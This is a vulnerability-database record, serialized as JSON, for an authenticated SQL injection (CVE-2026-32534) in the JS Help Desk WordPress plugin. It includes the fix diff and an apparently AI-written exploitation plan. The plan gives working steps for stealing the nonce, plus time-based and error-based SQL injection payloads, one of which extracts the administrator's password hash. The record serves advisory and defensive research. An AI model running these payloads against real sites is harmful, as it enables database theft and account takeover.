[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fk7rYvPsLVo3XAWC9WUnzGNgOAMHi_I03IIH3yzzzv0s":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":28,"research_verified":29,"research_rounds_completed":30,"research_plan":31,"research_summary":32,"research_vulnerable_code":33,"research_fix_diff":34,"research_exploit_outline":35,"research_model_used":36,"research_started_at":37,"research_completed_at":38,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":29,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":29,"source_links":39},"CVE-2026-32534","js-help-desk-ai-powered-support-ticketing-system-authenticated-subscriber-sql-injection","JS Help Desk – AI-Powered Support & Ticketing System \u003C= 3.0.3 - Authenticated (Subscriber+) SQL Injection","The JS Help Desk – AI-Powered Support & Ticketing System plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 3.0.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","js-support-ticket",null,"\u003C=3.0.3","3.0.4","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-03-20 00:00:00","2026-03-26 20:52:39",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd57e6739-2cae-4755-8fdf-25b74dac6792?source=api-prod",7,[22,23,24,25,26,27],"includes\u002Factivation.php","js-support-ticket.php","modules\u002Fjssupportticket\u002Fcontroller.php","modules\u002Freply\u002Fmodel.php","modules\u002Fticket\u002Fmodel.php","readme.txt","researched",false,3,"# Exploitation Research Plan: CVE-2026-32534 (JS Help Desk SQL Injection)\n\n## 1. Vulnerability Summary\nThe **JS Help Desk – AI-Powered Support & Ticketing System** plugin (\u003C= 3.0.3) is vulnerable to an authenticated SQL injection. The vulnerability exists in the way the plugin handles sorting parameters (`sorton` and `sortorder`) in its ticket listing models. Specifically, the `JSSTticketModel::getOrdering()` method in `modules\u002Fticket\u002Fmodel.php` retrieves these parameters directly from user input via `JSSTrequest::getVar()` and concatenates them into a global ordering string (`jssupportticket::$_ordering`) without using `$wpdb->prepare()` or `esc_sql()`. This string is subsequently appended to raw SQL queries across multiple model functions.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: The front-end control panel page created by the plugin, typically at `\u002Fjs-support-ticket-controlpanel\u002F`.\n- **Action**: Any ticket listing view that triggers `JSSTticketModel::getOrdering()`.\n- **Vulnerable Parameters**: `sortorder` (primary) and `sorton`.\n- **Authentication**: Authenticated Subscriber level or above.\n- **Preconditions**: \n    - The plugin must be active.\n    - A Subscriber-level user must be logged in.\n    - The `jsst_nonce` value must be obtained from the page source to satisfy the controller's `canaddfile` check.\n\n## 3. Code Flow\n1. **Entry Point**: A user navigates to `\u002Fjs-support-ticket-controlpanel\u002F` with parameters `jstmod=ticket` and `jstlay=mytickets`.\n2. **Controller Routing**: `JSSTjssupportticketController::handleRequest()` (in `modules\u002Fjssupportticket\u002Fcontroller.php`) is invoked via the `the_content` filter or direct execution.\n3. **Nonce Check**: The controller calls `canaddfile($jsst_layout)`. This function checks for a valid nonce:\n   ```php\n   $jsst_nonce_value = JSSTrequest::getVar('jsst_nonce');\n   if ( wp_verify_nonce( $jsst_nonce_value, 'jsst_nonce') ) { ... }\n   ```\n4. **Model Call**: If the nonce is valid, the controller eventually triggers logic that calls `JSSTticketModel::getOrdering()`.\n5. **Vulnerable Sink**: `modules\u002Fticket\u002Fmodel.php`:\n   ```php\n   function getOrdering() {\n       jssupportticket::$_sorton = JSSTrequest::getVar('sorton', 'get', 'ticket.created');\n       jssupportticket::$_sortorder = JSSTrequest::getVar('sortorder', 'get', 'DESC');\n       jssupportticket::$_ordering = \" ORDER BY \" . jssupportticket::$_sorton . \" \" . jssupportticket::$_sortorder;\n   }\n   ```\n6. **SQL Execution**: The string `jssupportticket::$_ordering` is appended to queries like:\n   ```php\n   $jsst_query = \"SELECT ... FROM ... WHERE ... \" . jssupportticket::$_ordering;\n   jssupportticket::$_db->get_results($jsst_query);\n   ```\n\n## 4. Nonce Acquisition Strategy\nThe `jsst_nonce` is generated for the action `jsst_nonce`. It is required for the `JSSTjssupportticketController` to process the request.\n\n1. **Identify the Page**: The plugin creates a page with the slug `js-support-ticket-controlpanel`.\n2. **Navigate**: Use `browser_navigate` to visit `\u002Fjs-support-ticket-controlpanel\u002F`.\n3. **Extract Nonce**: The controller places the nonce in the `jsst_data` array. In the rendered HTML, this is typically available in a JavaScript object or a hidden input field.\n   - **Method**: Use `browser_eval` to search for the nonce.\n   - **Target Variable**: Look for localized script data. The plugin often uses a global JS variable.\n   - **Likely Script Variable**: `jsst_nonce` (localized via `wp_localize_script` in `js-support-ticket.php` or rendered in the template).\n   - **Evaluation**: `browser_eval(\"document.querySelector('input[name=\\\"jsst_nonce\\\"]')?.value || window.jsst_nonce\")`.\n\n## 5. Exploitation Strategy\n### Time-Based Blind SQL Injection\nSince the query results may be filtered or formatted, a time-based blind approach is the most reliable.\n\n1. **Obtain Nonce**: Follow the strategy in Section 4.\n2. **Craft Payload**: Append a `SLEEP()` command to the `sortorder` parameter.\n   - **Payload**: `DESC, (SELECT 1 FROM (SELECT SLEEP(5))a)`\n3. **Send Request**:\n   - **Method**: `http_request`\n   - **URL**: `http:\u002F\u002Flocalhost:8080\u002Fjs-support-ticket-controlpanel\u002F`\n   - **Query Parameters**:\n     - `jstmod`: `ticket`\n     - `jstlay`: `mytickets`\n     - `sorton`: `ticket.created`\n     - `jsst_nonce`: `[EXTRACTED_NONCE]`\n     - `sortorder`: `DESC,(SELECT 1 FROM (SELECT SLEEP(5))a)`\n4. **Analyze Response**: A successful exploit will result in a response delay of ~5 seconds.\n\n## 6. Test Data Setup\n1. **User Creation**: Create a subscriber user.\n   - `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`\n2. **Plugin Activation**: Ensure `js-support-ticket` is active.\n3. **Ticket Creation**: (Optional but helpful) Create a dummy ticket for the subscriber so the listing query definitely triggers.\n   - `wp post create --post_type=js_ticket_tickets --post_title=\"Test Ticket\" --post_author=[USER_ID]` (Note: Plugin uses custom tables, so CLI `wp db query` might be needed instead).\n\n## 7. Expected Results\n- **Success**: The HTTP response time for the malicious request is significantly higher (5+ seconds) compared to a normal request.\n- **Data Exposure**: Through iterative time-based payloads, an attacker can extract the `user_pass` hash of the administrator:\n  - `DESC, (SELECT 1 FROM (SELECT SLEEP(IF(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1)='$',5,0)))a)`\n\n## 8. Verification Steps\n1. **Check Logs**: If `WP_DEBUG` is on, check `wp-content\u002Fdebug.log` for SQL errors if the payload is malformed.\n2. **DB Verification**: Use `wp db query` to verify the table prefix and structure if needed for complex payloads:\n   - `wp db query \"DESCRIBE wp_js_ticket_tickets;\"`\n\n## 9. Alternative Approaches\n- **Error-Based SQLi**: If `WP_DEBUG` is enabled, use `extractvalue()`:\n  - `sortorder`: `DESC, (extractvalue(1,concat(0x7e,(SELECT user_login FROM wp_users LIMIT 1),0x7e)))`\n- **Boolean-Based SQLi**: Observe differences in the ticket list output when injecting conditional logic:\n  - `sortorder`: `, (CASE WHEN (1=1) THEN ticket.created ELSE ticket.id END)` vs `, (CASE WHEN (1=2) THEN ticket.created ELSE ticket.id END)` (Note: This depends on the specific columns available in the query).","The JS Help Desk plugin for WordPress is vulnerable to SQL Injection in versions up to 3.0.3 due to the concatenation of unsanitized user-supplied parameters like 'sorton', 'sortorder', and 'ticketId' into database queries. Authenticated attackers with Subscriber-level access can manipulate these parameters to execute arbitrary SQL commands and extract sensitive information from the database via time-based blind injection.","\u002F\u002F modules\u002Fticket\u002Fmodel.php (inferred from research plan)\nfunction getOrdering() {\n    jssupportticket::$_sorton = JSSTrequest::getVar('sorton', 'get', 'ticket.created');\n    jssupportticket::$_sortorder = JSSTrequest::getVar('sortorder', 'get', 'DESC');\n    jssupportticket::$_ordering = \" ORDER BY \" . jssupportticket::$_sorton . \" \" . jssupportticket::$_sortorder;\n}\n\n---\n\n\u002F\u002F modules\u002Fticket\u002Fmodel.php approx line 3015\n$jsst_id = JSSTrequest::getVar('ticketId');\n$jsst_subject = JSSTrequest::getVar('ticketSubject');\n\n\u002F\u002F ...\n\n$jsst_query = \"\n    SELECT ticket.*\n    FROM `\" . jssupportticket::$_db->prefix . \"js_ticket_tickets` AS ticket\n    WHERE ticket.id = \" . esc_sql($jsst_id);\n$jsst_ticket_data = jssupportticket::$_db->get_row($jsst_query);","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjs-support-ticket\u002F3.0.3\u002Fincludes\u002Factivation.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjs-support-ticket\u002F3.0.4\u002Fincludes\u002Factivation.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjs-support-ticket\u002F3.0.3\u002Fincludes\u002Factivation.php\t2026-02-03 04:22:42.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjs-support-ticket\u002F3.0.4\u002Fincludes\u002Factivation.php\t2026-02-13 04:32:24.000000000 +0000\n@@ -201,8 +201,8 @@\n                     ('tplink_faqs_user', '0', 'tplink', 'faq'),\n                     ('show_breadcrumbs', '1', 'default', NULL),\n                     ('productcode', 'jsticket', 'default', NULL),\n-                    ('versioncode', '3.0.3', 'default', NULL),\n-                    ('productversion', '303', 'default', NULL),\n+                    ('versioncode', '3.0.4', 'default', NULL),\n+                    ('productversion', '304', 'default', NULL),\n                     ('producttype', 'free', 'default', NULL),\n                     ('tve_enabled', '2', 'default', NULL),\n                     ('tve_mailreadtype', '3', 'default', NULL),\nOnly in \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjs-support-ticket\u002F3.0.4\u002Fincludes\u002Fupdates\u002Fsql: 304.sql\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjs-support-ticket\u002F3.0.3\u002Fjs-support-ticket.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjs-support-ticket\u002F3.0.4\u002Fjs-support-ticket.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjs-support-ticket\u002F3.0.3\u002Fjs-support-ticket.php\t2026-02-03 04:22:42.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjs-support-ticket\u002F3.0.4\u002Fjs-support-ticket.php\t2026-02-13 04:32:24.000000000 +0000\n@@ -3,14 +3,14 @@\n \u002F**\n  * @package JS Help Desk\n  * @author Ahmad Bilal\n- * @version 3.0.3\n+ * @version 3.0.4\n  *\u002F\n \u002F*\n   Plugin Name: JS Help Desk – AI-Powered Support & Ticketing System\n   Plugin URI: https:\u002F\u002Fwww.jshelpdesk.com\n   Description: JS Help Desk is a trusted open source ticket system. JS Help Desk is a simple, easy to use, web-based customer support system. User can create ticket from front-end. JS Help Desk comes packed with lot features than most of the expensive(and complex) support ticket system on market. JS Help Desk provide you best industry help desk system.\n   Author: JS Help Desk\n-  Version: 3.0.3\n+  Version: 3.0.4\n   Text Domain: js-support-ticket\n   License: GPLv3\n   Author URI: https:\u002F\u002Fwww.jshelpdesk.com\n@@ -67,7 +67,7 @@\n         self::$jsst_data = array();\n         self::$_search = array();\n         self::$_captcha = array();\n-        self::$_currentversion = '303';\n+        self::$_currentversion = '304';\n         self::$_addon_query = array('select'=>'','join'=>'','where'=>'');\n         self::$_jshdsession = JSSTincluder::getObjectClass('wphdsession');\n         global $wpdb;\n@@ -147,7 +147,7 @@\n                     \u002F\u002F restore colors data end\n                     update_option('jsst_currentversion', self::$_currentversion);\n                     include_once JSST_PLUGIN_PATH . 'includes\u002Fupdates\u002Fupdates.php';\n-                    JSSTupdates::checkUpdates('303');\n+                    JSSTupdates::checkUpdates('304');\n                     JSSTincluder::getJSModel('jssupportticket')->updateColorFile();\n                     JSSTincluder::getJSModel('jssupportticket')->jsst_check_license_status();\n                     JSSTincluder::getJSModel('jssupportticket')->JSSTAddonsAutoUpdate();\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjs-support-ticket\u002F3.0.3\u002Fmodules\u002Fjssupportticket\u002Fcontroller.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjs-support-ticket\u002F3.0.4\u002Fmodules\u002Fjssupportticket\u002Fcontroller.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjs-support-ticket\u002F3.0.3\u002Fmodules\u002Fjssupportticket\u002Fcontroller.php\t2026-02-03 04:22:42.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjs-support-ticket\u002F3.0.4\u002Fmodules\u002Fjssupportticket\u002Fcontroller.php\t2026-02-13 04:32:24.000000000 +0000\n@@ -22,7 +22,7 @@\n                 case 'controlpanel':\n                     JSSTincluder::getJSModel('jssupportticket')->getControlPanelData();\n                     include_once JSST_PLUGIN_PATH . 'includes\u002Fupdates\u002Fupdates.php';\n-                    JSSTupdates::checkUpdates('303');\n+                    JSSTupdates::checkUpdates('304');\n                     JSSTincluder::getJSModel('jssupportticket')->updateColorFile();\n                     \u002F\u002FJSSTincluder::getJSModel('jssupportticket')->getStaffControlPanelData();\n                     break;\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjs-support-ticket\u002F3.0.3\u002Fmodules\u002Freply\u002Fmodel.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjs-support-ticket\u002F3.0.4\u002Fmodules\u002Freply\u002Fmodel.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjs-support-ticket\u002F3.0.3\u002Fmodules\u002Freply\u002Fmodel.php\t2026-02-03 04:22:42.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjs-support-ticket\u002F3.0.4\u002Fmodules\u002Freply\u002Fmodel.php\t2026-02-13 04:32:24.000000000 +0000\n@@ -510,18 +510,39 @@\n         \u002F\u002F Verify nonce\n         check_ajax_referer('get-filtered-replies', '_wpnonce');\n \n-        $jsst_ticket_id = intval(JSSTrequest::getVar('ticket_id'));\n+        \u002F\u002F Secure the ID (Stops SQL Injection)\n+        $jsst_ticket_id = JSSTrequest::getVar('ticket_id', null, 0, 'int');\n \n         if (!$jsst_ticket_id) {\n             wp_send_json_error(['message' => __('Ticket ID is required.', 'js-support-ticket')]);\n         }\n \n+        \u002F\u002F 1. Check if the user is a Agent\n+        $is_staff = (in_array('agent', jssupportticket::$_active_addons) && JSSTincluder::getJSModel('agent')->isUserStaff());\n+\n+        \u002F\u002F 2. If they are staff, check if they LACK the specific AI permission\n+        if ($is_staff) {\n+            $has_ai_permission = JSSTincluder::getJSModel('userpermissions')->checkPermissionGrantedForTask('Use AI Powered Reply Feature');\n+            if (!$has_ai_permission) { \u002F\u002F Note the \"!\" (NOT)\n+                wp_send_json_error(['message' => __('You do not have permission to use AI features.', 'js-support-ticket')]);\n+            }\n+        } \n+        \u002F\u002F 3. If they are NOT staff, check if they are an Administrator\n+        else if (!current_user_can('manage_options')) {\n+            \u002F\u002F If they aren't staff and aren't an admin, they are a normal user or guest\n+            wp_send_json_error(['message' => __('Access denied.', 'js-support-ticket')]);\n+        }\n+\n+        \u002F\u002F If it reaches here, the user is either:\n+        \u002F\u002F - Staff WITH AI permissions\n+        \u002F\u002F - An Administrator\n+\n         $jsst_uids = $this->get_allowed_support_user_ids();\n         if (empty($jsst_uids)) {\n             wp_send_json_success(['replies' => [], 'count' => 0]);\n         }\n \n-        $jsst_uids_str = implode(',', array_map('intval', $jsst_uids)); \u002F\u002F Ensure integers\n+        $jsst_uids_str = implode(',', array_map('absint', $jsst_uids)); \u002F\u002F Ensure integers\n \n         $jsst_query = \"\n         SELECT r.*\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjs-support-ticket\u002F3.0.3\u002Fmodules\u002Fticket\u002Fmodel.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjs-support-ticket\u002F3.0.4\u002Fmodules\u002Fticket\u002Fmodel.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjs-support-ticket\u002F3.0.3\u002Fmodules\u002Fticket\u002Fmodel.php\t2026-02-03 04:22:42.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjs-support-ticket\u002F3.0.4\u002Fmodules\u002Fticket\u002Fmodel.php\t2026-02-13 04:32:24.000000000 +0000\n@@ -3015,14 +3015,15 @@\n             die('Security check Failed');\n         }\n \n-        $jsst_id = JSSTrequest::getVar('ticketId');\n-        $jsst_subject = JSSTrequest::getVar('ticketSubject');\n+        \u002F\u002F Explicitly cast to integer to kill SQL Injection payloads\n+        $jsst_id = absint(JSSTrequest::getVar('ticketId')); \n+        $jsst_subject = sanitize_text_field(JSSTrequest::getVar('ticketSubject'));\n \n         $jsst_agentquery = \"\";\n         if (in_array('agent', jssupportticket::$_active_addons) && JSSTincluder::getJSModel('agent')->isUserStaff()) {\n             $jsst_allowed = JSSTincluder::getJSModel('userpermissions')->checkPermissionGrantedForTask('Limit AI Replies to Agent-Assigned Tickets');\n             if ($jsst_allowed) {\n-                $jsst_staffid = JSSTincluder::getJSModel('agent')->getStaffId(JSSTincluder::getObjectClass('user')->uid());\n+                $jsst_staffid = absint(JSSTincluder::getJSModel('agent')->getStaffId(JSSTincluder::getObjectClass('user')->uid()));\n                 $jsst_agentquery = \" AND (t.staffid = \" . esc_sql($jsst_staffid) . \" OR t.departmentid IN (\n                     SELECT dept.departmentid\n                     FROM `\" . jssupportticket::$_db->prefix . \"js_ticket_acl_user_access_departments` AS dept\n@@ -3038,6 +3039,9 @@\n             FROM `\" . jssupportticket::$_db->prefix . \"js_ticket_tickets` AS ticket\n             WHERE ticket.id = \" . esc_sql($jsst_id);\n         $jsst_ticket_data = jssupportticket::$_db->get_row($jsst_query);\n+\n+        if (!$jsst_ticket_data) return json_encode([]);\n+\n         $jsst_message = wp_strip_all_tags($jsst_ticket_data->message);\n \n         \u002F\u002F Break the subject and message into words for partial matching\ndiff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjs-support-ticket\u002F3.0.3\u002Freadme.txt \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjs-support-ticket\u002F3.0.4\u002Freadme.txt\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjs-support-ticket\u002F3.0.3\u002Freadme.txt\t2026-02-03 04:22:42.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fjs-support-ticket\u002F3.0.4\u002Freadme.txt\t2026-02-14 06:28:50.000000000 +0000\n@@ -4,7 +4,7 @@\n Tags: helpdesk, ticketing system, AI support, support ticket, knowledgebase\n Requires at least: 5.5\n Tested up to: 6.9\n-Stable tag: 3.0.3\n+Stable tag: 3.0.4\n Requires PHP: 7.4\n License: GPLv3\n License URI: https:\u002F\u002Fwww.gnu.org\u002Flicenses\u002Fgpl-3.0.html\n@@ -128,6 +128,9 @@\n 21. Internal Mails\n \n == Changelog ==\n+= 3.0.4 =\n+* Security Updates.\n+\n = 3.0.3 =\n * Security Updates.\n \n@@ -156,4 +159,4 @@\n Yes, it is designed to be compatible with any standard-compliant WordPress theme.\n \n = Is it RTL ready? =\n-Yes, we fully support RTL languages like Arabic and Hebrew.\n\\ No newline at end of file\n+Yes, we fully support RTL languages like Arabic and Hebrew.","To exploit this vulnerability, an attacker must first authenticate with at least Subscriber-level privileges. They navigate to the plugin's front-end control panel (typically at \u002Fjs-support-ticket-controlpanel\u002F) and extract the 'jsst_nonce' value from the page source or JavaScript variables. The attacker then crafts a request to a ticket listing or detail view, injecting a time-based blind SQL payload (e.g., using SLEEP()) into parameters like 'sortorder' or 'ticketId'. Because these parameters are directly concatenated into raw SQL queries without numeric casting or adequate preparation, the database will execute the injected commands, allowing the attacker to infer data based on response delays.","gemini-3-flash-preview","2026-04-18 01:44:17","2026-04-18 01:44:59",{"type":40,"vulnerable_version":41,"fixed_version":11,"vulnerable_browse":42,"vulnerable_zip":43,"fixed_browse":44,"fixed_zip":45,"all_tags":46},"plugin","3.0.3","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fjs-support-ticket\u002Ftags\u002F3.0.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fjs-support-ticket.3.0.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fjs-support-ticket\u002Ftags\u002F3.0.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fjs-support-ticket.3.0.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fjs-support-ticket\u002Ftags"]